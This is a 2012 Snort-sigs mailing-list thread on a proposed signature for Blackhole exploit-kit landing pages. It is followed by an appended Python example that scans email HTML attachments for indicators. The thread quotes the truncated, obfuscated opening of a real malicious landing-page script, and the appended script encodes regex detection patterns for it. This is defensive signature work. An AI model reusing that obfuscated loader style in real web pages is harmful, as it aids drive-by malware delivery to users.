[Snort-sigs] Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq"

Matt Olney molney at ...435...
Thu Mar 1 09:45:47 EST 2012


Nathan, Got an email entitled:

Fwd: Your Flight N 91-17249698
It had an attached html file with the following html (recognize it? :))

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Please wait untill the page loads...</title>
 </head>
 <body>
<h1>Please Wait... Loading... </h1><br>
 </body>

<script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new location();}catch(qqq){ss=String;if(aa

Etc...

Good rule :)

Matt

On Wed, Feb 29, 2012 at 4:35 PM, Community Signatures
<lists at ...3397...> wrote:

> On 02/29/12 15:19, Matt Olney wrote:
> > Since you're associating with an exploit kit, rather than an active
> > trojan, and given that exploits are typically aimed at user
> > applications, I'd use classtype:attempted-user;
>
> Understood, on the ET side we tend to use trojan-activity because the
> point of the exploit kit is to install a trojan/malware.  I always
> viewed attempted-user as privilege escalation.  I may just leave
> classtype off and let VRT apply this and the metadata as they feel fit.
>
> > Because it is a file, and you're not using any http_inspect buffers,
> > we'd use $FILE_DATA_PORTS in case it is delivered via mail (saw one like
> > that yesterday).
>
> Thanks Matt, can you elaborate more on this as I've not seen this
> behavior before, where Blackhole is delivered via mail.  I have seen
> mailing campaigns that include a link which, upon landing, is Blackhole.
> I don't disagree with your changes over $HTTP_PORTS but I have not seen
> this behavior especially with SMTPDs.
>
> > Again, primarily cosmetic changes, and does nothing, in this simple
> > case, to modify the functionality of the rule.
>
> Thank you for taking the time to explain the changes and current
> convention.
>
> Thanks,
> Nathan
>
>
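As an added example (not part of this thread, and not the proposed Snort rule itself), the script below illustrates Matt's point about $FILE_DATA_PORTS: when the landing page arrives as an e-mail attachment, detection has to run over the decoded attachment body rather than an HTTP response. It builds a constructed .eml, pulls out the HTML attachments, and matches only fragments visible in the sample posted above: the split `window['doc'+'ume'+'nt']` reference, the `catch(qq…)` handler the rule title refers to, and the misspelled decoy title. The addresses, subjects, filename and indicator names are my own assumptions.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample attachment: the decoy page and the opening of the
# obfuscated script exactly as quoted in the thread, nothing beyond it.
SAMPLE_ATTACHMENT = r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Please wait untill the page loads...</title>
 </head>
 <body>
<h1>Please Wait... Loading... </h1><br>
 </body>
<script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new location();}catch(qqq){ss=String;if(aa
"""

# Constructed benign attachment, used to show the scanner stays quiet on it.
BENIGN_ATTACHMENT = "<html><head><title>Itinerary</title></head><body>Flight details</body></html>\n"

# Indicator names are my own; each pattern is a fragment visible in the
# posted sample. The catch(qq...) handler is what the rule title refers to.
INDICATORS = {
    "split_document_ref": re.compile(r"window\['doc'\+'ume'\+'nt'\]"),
    "catch_qq_handler": re.compile(r"catch\(qq+\)\{"),
    "decoy_title": re.compile(r"<title>Please wait untill the page loads", re.IGNORECASE),
}
# Both script-level fragments together are what makes a hit "high probability";
# the decoy title on its own is only supporting evidence.
JS_INDICATORS = ("split_document_ref", "catch_qq_handler")


def build_eml(attachment_html, subject):
    """Build a constructed multipart message carrying one .html attachment."""
    msg = EmailMessage()
    msg["From"] = "noreply@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = subject
    msg.set_content("Please see the attached itinerary.")
    msg.add_attachment(attachment_html, subtype="html", filename="itinerary.html")
    return msg.as_bytes()


def html_attachments(raw):
    """Yield (filename, decoded text) for each attachment that is, or is named as, HTML."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            body = part.get_content()
            if isinstance(body, bytes):  # e.g. application/octet-stream with an .html name
                body = body.decode("utf-8", errors="replace")
            yield name, body


def scan_message(raw):
    """Return one finding per HTML attachment listing the indicators that matched."""
    findings = []
    for name, text in html_attachments(raw):
        hits = [label for label, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings.append({"attachment": name, "indicators": hits})
    return findings


def is_high_probability(hits):
    """True when both script fragments are present, not just the decoy title."""
    return all(label in hits for label in JS_INDICATORS)


if __name__ == "__main__":
    for subject, html in (("Fwd: Your Flight N 91-17249698", SAMPLE_ATTACHMENT),
                          ("Your itinerary", BENIGN_ATTACHMENT)):
        for finding in scan_message(build_eml(html, subject)):
            print(subject, finding["attachment"], finding["indicators"],
                  "HIGH" if is_high_probability(finding["indicators"]) else "low")
```

The scanner keys on the attachment's content and filename, not on the transport, which is the same reasoning behind matching on $FILE_DATA_PORTS instead of $HTTP_PORTS: the same bytes trip the same patterns whether they arrive over SMTP or HTTP. Requiring both script fragments before calling a hit high probability keeps a lone decoy title from generating an alert.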